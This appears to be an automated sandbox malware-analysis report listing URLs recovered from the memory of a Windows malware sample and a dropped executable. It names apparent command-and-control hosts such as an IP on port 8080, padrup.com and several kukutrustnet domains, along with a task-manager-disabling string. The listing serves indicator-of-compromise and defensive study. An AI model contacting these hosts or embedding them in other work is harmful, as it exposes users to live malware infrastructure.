            Source: PfBjDhHzvV.exe, 00000000.00000002.2241468768.0000000003EBB000.00000004.00000010.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2236989876.0000000000C93000.00000004.10000000.00040000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368382163.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368144994.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2235952393.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239052487.00000000011B9000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001D.00000002.2674188506.00000000024D3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001E.00000002.2680528942.0000000002633000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001F.00000002.2675030035.00000000023B3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000020.00000002.2659610605.0000000000DE3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000021.00000002.2643179759.0000000000363000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000022.00000002.2678320117.0000000002EC3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2713401139.0000000002859000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2707649439.0000000002713000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?10aef23e=1959305138
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?10aef23e=19593051388
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?15f8580=23037312
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?167a9d17=15085374369
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?167a9d17=1508537436j
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?167a9d17=1508537436n
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?1c6e18df=476977375
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?1c6e18df=476977375-&
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?1c6e18df=476977375L
            Source: PfBjDhHzvV.exe, 00000000.00000002.2241468768.0000000003EBB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?1c6e18df=476977375sw
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?212b208=34779656
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?212b208=34779656v
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2bf5c9b=276573090
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2bf5c9b=276573090~
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?36c07fa=459292624
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?4194e9e=343836950
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?4d57b0b=162199062
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?4d57b0b=162199062;
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?53c2ee=32936340
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?53c2ee=32936340F
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?588b379=464224605
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?653dba7=849272120
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?653dba7=849272120(
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?70c2488=591181480
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?7ca48dd=653487185
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?7ca48dd=6534871858
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?9db5459=1322951368
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?9db5459=1322951368_
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?c5c499=38882763
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?c5c499=38882763f
            Source: PfBjDhHzvV.exe, 00000000.00000002.2241468768.0000000003EBB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gifK
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2236989876.0000000000C93000.00000004.10000000.00040000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368382163.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368144994.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2235952393.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239052487.00000000011B9000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001D.00000002.2674188506.00000000024D3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001E.00000002.2680528942.0000000002633000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001F.00000002.2675030035.00000000023B3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000020.00000002.2659610605.0000000000DE3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000021.00000002.2643179759.0000000000363000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000022.00000002.2678320117.0000000002EC3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://89.11
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
            Source: explorer.exe, 0000000A.00000000.1446640101.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2836722675.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279215811.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279706971.000000000730A000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: svchost.exe, 00000008.00000000.1429731609.000001D959FF4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1429731609.000001D959FEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
            Source: explorer.exe, 0000000A.00000000.1446640101.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2836722675.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279215811.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279706971.000000000730A000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: svchost.exe, 00000008.00000000.1429731609.000001D959FF4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1429731609.000001D959FEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
            Source: SearchApp.exe, 0000000F.00000000.1566609930.000001F49BD00000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1550246125.000001F49A7D8000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1544825870.000001EC94D51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: smartscreen.exe, 00000014.00000000.1725623800.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: svchost.exe, 00000008.00000000.1429731609.000001D959FF4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1429731609.000001D959FEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ifdnzact.com/?dn=padrup.com&pid=9PO755G95
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777.info/home.gif
            Source: PfBjDhHzvV.exe, PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exeString found in binary or memory: http://kukutrustnet777888.info/
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet888.info/home.gif
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet987.info/home.gif
            Source: StartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.a.0
            Source: StartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c.0
            Source: StartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.hoL2
            Source: StartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adora
            Source: StartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.ph
            Source: svchost.exe, 00000008.00000000.1429731609.000001D959FF4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1429731609.000001D959FEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1446640101.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2836722675.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279215811.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279706971.000000000730A000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1730192772.00000159AD200000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2441166596.00000159AD200000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: SearchApp.exe, 0000000F.00000000.1566609930.000001F49BD00000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1550246125.000001F49A7D8000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1544825870.000001EC94D51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: smartscreen.exe, 00000014.00000000.1725623800.00000151AB221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: SearchApp.exe, 0000000F.00000000.1673985006.000001F4B3213000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlx
            Source: SearchApp.exe, 0000000F.00000000.1566609930.000001F49BD00000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1548678406.000001EC9A5C0000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560203634.000001F49B213000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: dwm.exe, 00000005.00000000.1392615637.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000005.00000002.3004388837.00000262ED790000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://osoft.co_2010-06X
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/1721684OEXECUTE=OPTIN
            Source: PfBjDhHzvV.exe, 00000000.00000002.2241468768.0000000003EBB000.00000004.00000010.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2236989876.0000000000C93000.00000004.10000000.00040000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368382163.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368144994.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2235952393.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239052487.00000000011B9000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001D.00000002.2674188506.00000000024D3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001E.00000002.2680528942.0000000002633000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001F.00000002.2675030035.00000000023B3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000020.00000002.2659610605.0000000000DE3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000021.00000002.2643179759.0000000000363000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000022.00000002.2678320117.0000000002EC3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2713401139.0000000002859000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2707649439.0000000002713000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?14117e3=189388539
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?158b8302=722929156
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?158b8302=722929156K
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?158b8302=722929156e
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1bfc4aa7=-538815176
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1bfc4aa7=-538815176G
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1bfc4aa7=-538815176Y
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1bfc4aa7=-538815176k
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1edc267=64718030
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?2a0a14c=132244452
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?2a0a14c=132244452K
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?3467cb5=274755465
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?3467cb5=274755465#
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?3f9f77c=600421212
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?3f9f77c=600421212=
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?4b65019=711512289
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FA1000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?52dc95=21721684
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?52dc95=21721684~
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?568bd78=635252296
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?617d87e=1022260460
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?617d87e=1022260460)
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?6eac3db=348146577
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?7a93601=771179526b
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?7a93601=771179526q
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?87df311=569887812
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?87df311=569887812x
            Source: faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2665565743.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?8dc219=65031855
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?a66df5=87257000
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?f24e375=-2008285411
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?f24e375=-2008285411y
